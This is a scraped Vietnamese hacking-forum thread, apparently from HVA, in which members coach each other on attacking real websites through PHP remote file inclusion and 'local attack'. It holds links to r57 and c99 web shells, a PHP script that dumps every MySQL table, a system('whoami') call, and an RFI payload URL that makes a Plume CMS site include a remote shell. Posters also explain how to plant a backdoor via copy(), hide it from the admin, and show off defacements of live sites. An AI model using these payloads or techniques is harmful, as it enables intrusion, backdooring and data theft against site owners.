Ặc khó hiểu quá huynh. Http://66.246.103.230/~dianguc/rem.phpLần sau định hỏi huynh nào thì PM cho huynh ấy, không mấy đệ vào nghịch .. ngượng quá :)]]>
$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz
<?php $dbhost = "localhost"; $dbuser = "ODBC"; $dbpass = ""; $dbname = "mysql"; header('Content-Type: text/x-delimtext; name="'.$dbname.'.xml"'); header('Content-disposition: attachment; filename="' . $dbname . '.xml"'); echo "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n<tables>"; mysql_connect ($dbhost, $dbuser,$dbpass); mysql_select_db($dbname); $result = mysql_list_tables($dbname); $num_rows = mysql_num_rows($result); for ($i = 0; $i < $num_rows; $i++) { $table = mysql_tablename($result, $i); echo "\n<table name=\"$table\">"; $fresult = mysql_query("SHOW COLUMNS FROM $table"); if (mysql_num_rows($fresult) > 0) { $j = 0; while ($frow = mysql_fetch_assoc($fresult)) { $field[$j] = $frow[Field]; $j++; } $rresult = mysql_query("SELECT * FROM $table"); if (mysql_num_rows($rresult) > 0) { echo "<rows number=\"". mysql_num_rows($rresult) ."\">"; while ($row = mysql_fetch_row($rresult)) { echo "<row>"; for ($k=0; $k<$j; $k++) echo "<$field[$k]>$row[$k]</$field[$k]>"; echo "</row>"; } echo "</rows>"; } } echo "</table>"; } echo "</tables>"; ?>
Bác ngó xem em deface kiểu gì. Hơi bị lịch sự.Có thấy lão deface đâu nhỉ , chỉ giỏi lừa tôi :">
PHP: system ("whoami");Nó để thế chỉ sợ report cho chủ server nó lại chẳng hiểu j` :) :D]]>
Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.htmlNói gì thì nói chứ dùng phpMyAdmin vẫn sướng nhất, mà install bằng shell command, có mất thời gian đâu. Còn nếu dùng 1 file thì Luke khuyên dùng r57 và c99 shell Ưu điểm của r57 là hack theo kiểu RFI rất sướng, ko cần upload ^_^ Tuy nhiên nếu tìm được weak chmod dir thì tương c99 mạnh hơn. Nhất là cái mysql function của nó. kết hợp cả 2 là tuyệt vời nhất Để Luke up demo lên cho mọi người. Đây cũng là một đoạn phim hacking demo rất đáng xem về kỹ thuật tấn công local, chỉ tiếc là nó dùng tiếng (*@&^@#&*^@ http://67.15.40.2/~tranphu/files/r57.rar Mọi người xem thế nào nhé]]>
ato wrote:anh Luke ơi cho em hỏi làm sao ma` khôg cần upload con r57 huặc c99 lên host mà vẫn có thể run nó đươc hén ?anh có thể nó rõ hơn được không ạ , cảm ơn anh nhiều .]]>
Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.htmlNói gì thì nói chứ dùng phpMyAdmin vẫn sướng nhất, mà install bằng shell command, có mất thời gian đâu. Còn nếu dùng 1 file thì Luke khuyên dùng r57 và c99 shell Ưu điểm của r57 là hack theo kiểu RFI rất sướng, ko cần upload ^_^ Tuy nhiên nếu tìm được weak chmod dir thì tương c99 mạnh hơn. Nhất là cái mysql function của nó. kết hợp cả 2 là tuyệt vời nhất Để Luke up demo lên cho mọi người. Đây cũng là một đoạn phim hacking demo rất đáng xem về kỹ thuật tấn công local, chỉ tiếc là nó dùng tiếng (*@&^@#&*^@ http://67.15.40.2/~tranphu/files/r57.rar Mọi người xem thế nào nhé
khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi vd http://site.com/index.php?file=http://host ko support php/hihi.php nội dung file hihi.php lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta căn bản là như thếAnh gamma ơi cho em hỏi , em viết hàm copy như anh nói để thử practise trong host của em , em cấp permission write public rồi mà nó còn báo lỗi thế này : Code:
Warning:copy(http://freewebtown.com/tang05/fileremview)[function.copy]:failed to open stream:HTTP wrapper does not support writeable connections in /home/lonely/public_html/attacky.php on line 15
Code:R57shell có thể làm được tất cả công việc thay cho phpMyAdmin. Quan trọng là biết câu lệnh SQL]]>
Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ??? Sao ko tự viết 1 file php để select db nho nhỏ :D cần gì mà phải ôm luôn cái phpmyadmin kinh dzậy :D$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix :( :(, cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra Có 2 phương pháp nhanh ở việc này : Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)anh dinhcaohack ơi ! hồi wa em coi cái film demo của may thằng cha kia nó demo , thì thấy dùng hàm include thì chỉ có thể attack mấy cái host free dỏm hay sao a' Code:
http://bacaplume.free.fr/manager/frontinc/prepend.php?_PX_config[manager_path]=http://nhuy.hollosite.com/mshell.txt?
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra Có 2 phương pháp nhanh ở việc này : Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .!Anh chưa thử xem video :), anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :"> Còn cái "dùng "include " để hack" không phải như em nghĩ đâu :D, đây là cách nhúng shell vào 1 file PHP trên host victim :), wa vờ nít đi em, anh ngại type bên này lắm :)]]>
Code:các anh ơi ! cho em xin na`o , em cu~ng biết VNIIS rồi có điều ở đây là topic về Hacklocal mà anh , thưc ra forum na`o thi` cũng thế cả , kĩ thuật hack ở viêtnam cũng đều dùng tools, và kĩ thuật của các hacker nước ngoài cả , có điều kĩ thuật nó từ người này qua người khác và phát triển thêm .. ..rất mong các anh tận tình hướng dẫn a ! còn dùng hack làm gì thì em nghĩ cũng là do ý thức của mỗi người cả ! em không có ý gì khác , chỉ mong các anh đoàn kết xây dựng HVA ngày càng mạnh .]]>
hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit ! ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra Có 2 phương pháp nhanh ở việc này : Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
cảm ơn anh nhiều he'n , hồi đêm wa em cu~ng vào milw0rm , và dùng cai include đo'..đo' anh, em nhớ hình như là /exploits/1280 gì đó thì phải ...nhưng khi include rồi , em thưc hiện mấy cái lênh thì nó báo lỗi include(XXX) tùm lum cả , mà em cu~ng không hiểu cái file depend.php nó viết cái gì cả :D , anh có thể chỉ giúp em không ạ ? okis em thử wa vo*` nit ;) thưc ra em là stand_alone bên đó :D , thanks anh nhiều ... ]]>điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !Riêng cái chuyện nói tục chửi bậy là không đủ .. tư cách rồi nhóc ạ :Dtrang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .!Anh chưa thử xem video :), anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :"> Còn cái "dùng "include " để hack" không phải như em nghĩ đâu :D, đây là cách nhúng shell vào 1 file PHP trên host victim :), wa vờ nít đi em, anh ngại type bên này lắm :)
Anh chỉ nghĩ là, trước khi nghiên cứu về hacking nên trang bị cho mình đầy đủ các kiến thức căn bản đi đã. Anh nghĩ em nên học một ngôn ngữ lập trình cho chắc đã. Bởi vì khi em nắm chắc, trong trường hợp này là PHP. Em sẽ ko cần phải hỏi han nhiều. Mà bây giờ hỏi han chưa chắc em đã nắm được bản chất của vấn đề. Topic này viết về Local Attack thì cũng ko nên quá đi xa về RFI, nếu muốn mọi người có thể mở 1 topic ra. Tránh việc để cho các bài viết HVA trở nên lộn xộn. Cảm ơn.cảm ơn về ý kiến của anh , em cũng đã & đang tự học php qua ebook , nhưng chỉ ở mức thao tác với database và lấy 1 số thông tin phía người dùng , còn network em cũng đã hoc qua các course MCSA , với topic mà anh đưa ra em thấy rất thú vị đó chứ ! em đã thử dùng attack theo kiểu include ngay sau khi tham gia topic này nhưng chỉ áp dụng được cho 1 số host em tìm theo "plume CMS" ,nhưng không thực hiện được lênh shell ???, còn theo cách copy từ remview từ 1 host như các anh hướng dẫn ,em cũng đã thử nhưng cách này chưa thành công (em cũng dùng qua het r57,c99,remview nhưng không nhớ tên chỉ biết nó là backdoor :D) ...qua topic này em muốn tìm hiểu rõ hơn rất mong các anh hướng dẫn nũa ạ :D ]]>
Designed: Le Nhat Nam - Security checked: xLuke & Hacked by quocboy =))cái code source forum nhạc đó là của sweetlove , code của thằng bạn tri kỉ của em :D , thế mà lê nhật nam là ai mà đưa cái bản quyền vào ac' thiệt :D]]>
Rõ hay nhỉ chỗ HVA là để khoe chiến tích các trang web đã bị hack hay sao mà mang ra đây khoe thế ? Mấy cụ bên BQT sao lại sơ xuất thế này]]>